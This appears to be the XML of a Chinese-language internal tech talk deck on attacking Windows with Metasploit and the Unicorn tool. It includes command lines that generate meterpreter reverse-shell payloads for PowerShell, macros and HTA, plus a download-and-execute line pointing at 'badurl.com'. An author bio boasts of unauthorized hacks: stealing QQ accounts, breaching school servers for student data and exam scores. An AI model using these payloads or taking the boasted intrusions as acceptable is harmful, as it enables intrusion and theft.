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9" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="258" r:id="rId15"/>
    <p:sldId id="259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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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5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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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42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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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77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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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74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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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5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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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5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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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8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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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59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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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63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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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2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74E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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3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B074E-E0A2-4D37-BAA9-C15C720ACAE1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D87A-829E-4B78-80CD-BC14D5F0B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30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%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/item/%E5%A4%96%E5%A3%B3%E7%A8%8B%E5%BA%8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aike.baidu.com/item/%E8%BD%AF%E4%BB%B6%E7%95%8C%E9%9D%A2" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/item/.NET%20Framework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pid7/metasploit-framewor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29464" y="1389529"/>
            <a:ext cx="8739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Hacking some Windows with MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>（美少妇）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830215" y="320435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分享人： 前端 张利鹏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977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MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最常见的渗透流程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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>、开始攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>run/exploit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49" y="2767417"/>
            <a:ext cx="9902414" cy="273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、个人安全经历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MSF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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell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hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>简介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Unicorn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 实战：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>hacked Windows with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>unicorn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5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825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Windows Power Shell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33821"/>
            <a:ext cx="10515600" cy="1061078"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是一种命令行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>外壳程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和脚本环境，使命令行用户和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>脚本编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>者可以利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.NET Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的强大功能。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27948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HTA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4120462"/>
            <a:ext cx="10515600" cy="1210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HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>HTML Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>的缩写（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>应用程序），是软件开发的新概念，直接将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>保存成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>HTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>的格式，就是一个独立的应用软件，与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>VB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>等程序语言所设计的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>软件界面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>没什么差别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5100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3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、个人安全经历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MSF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powershell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hta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Unicorn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>简介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 实战：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>hacked Windows with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>unicorn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01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Unicorn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（独角兽）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199" y="14060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开源地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>https://github.com/trustedsec/unicorn</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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38198" y="2662626"/>
            <a:ext cx="100397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Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> straight into memory.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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38197" y="4297345"/>
            <a:ext cx="100397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使用方法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p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clone https://github.com/trustedsec/unicorn </a:t>
            </a:r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cd unicorn</a:t>
            </a:r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python unicorn.py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82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959" y="776377"/>
            <a:ext cx="10515600" cy="497744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Usage: python unicorn.py payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_ipaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> port &lt;optional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> or macro, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>crt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PS Example: python unicorn.py windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> 192.168.1.5 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PS Down/Exec: python unicorn.py windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>download_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> exe=test.exe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=http://badurl.com/payload.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Macro Example: python unicorn.py windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> 192.168.1.5 443 macro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTA Example: python unicorn.py windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> 192.168.1.5 443 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>hta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CRT Example: python unicorn.py &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>path_to_payload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exe_encode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crt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Custom PS1 Example: python unicorn.py &lt;path to ps1 file&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Custom PS1 Example: python unicorn.py &lt;path to ps1 file&gt; macro 500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Help Menu: python unicorn.py --help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5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408" y="88271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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>、 实战：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>hacked Windows with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t> and unicorn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85" y="3088257"/>
            <a:ext cx="4883990" cy="3166344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Thanks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>enjoying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pPr lvl="5"/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lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="5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3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、个人安全经历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MSF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powershell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hta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Unicorn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 实战：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>hacked Windows with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>unicorn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8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509" y="296113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个人安全经历简介：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4509" y="1621676"/>
            <a:ext cx="10515600" cy="4658354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/>
              <a:t>2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>励志成为一名“黑客”，加入中国红客联盟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>AG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>小组团队</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>曾参加由钓鱼岛事件引起的中日黑客大战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>曾用易语言编写外挂程序，盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>账号。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>曾利用黑客工具攻击了很多非法站点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2013</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>年读大学。开始系统学习计算机知识</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>曾组建我校第一支信息安全团队</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>曾获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>年安徽省“蓝盾杯”信息安全攻防大赛二等奖。（队长）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>曾获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>年“蓝盾杯”信息安全攻防大赛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>第四名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>（队长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>曾获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>年“智胜杯”网络与信息安全挑战赛第六</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>（队长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曾参加第一届百度杯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>，排名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>60-70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曾黑遍我校各大服务器，获得全校学生信息，免费享用学校百兆带宽网速，所有在线考试满分。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>曾利用一周时间在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>补天漏洞平台刷了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个中高危漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>曾利用俩周时间在教育平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>刷了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>47</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>个漏洞。最高排名第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p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6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、个人安全经历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MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>简介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powershell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hta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Unicorn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 实战：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>hacked Windows with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>unicorn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7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580" y="761940"/>
            <a:ext cx="10711133" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> （美少妇）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/>
              <a:t>被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>誉为 黑掉整个星球的工具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全称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>-framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>  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地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>https://github.com/rapid7/metasploit-framework</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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94580" y="2769019"/>
            <a:ext cx="107111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/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>是渗透大杀器。尤其是内网环境下，更是恐怖。本人在校期间，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>拿下了很多服务器。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0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440" y="19524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MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相关术语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468" y="1358537"/>
            <a:ext cx="10019211" cy="477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MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最常见的渗透流程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6253"/>
            <a:ext cx="7866504" cy="4351338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、搜索攻击模块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66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MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最常见的渗透流程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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>、载入攻击模块、查看模块参数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3931"/>
            <a:ext cx="9141953" cy="46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MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最常见的渗透流程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、设置模块参数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84" y="2353469"/>
            <a:ext cx="10844036" cy="359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645</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>78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PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>分享目录</vt:lpstr>
      <vt:lpstr>个人安全经历简介：</vt:lpstr>
      <vt:lpstr>分享目录</vt:lpstr>
      <vt:lpstr>MSF （美少妇） 被誉为 黑掉整个星球的工具 全称：metasploit-framework    github地址：https://github.com/rapid7/metasploit-framework</vt:lpstr>
      <vt:lpstr>MSF相关术语</vt:lpstr>
      <vt:lpstr>MSF最常见的渗透流程</vt:lpstr>
      <vt:lpstr>MSF最常见的渗透流程</vt:lpstr>
      <vt:lpstr>MSF最常见的渗透流程</vt:lpstr>
      <vt:lpstr>MSF最常见的渗透流程</vt:lpstr>
      <vt:lpstr>分享目录</vt:lpstr>
      <vt:lpstr>Windows Power Shell</vt:lpstr>
      <vt:lpstr>分享目录</vt:lpstr>
      <vt:lpstr>Unicorn（独角兽）</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>5、 实战：hacked Windows with msf and unicorn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100</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-19T12:38:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-23T09:07:40Z</dcterms:modified>
</cp:coreProperties>
</file>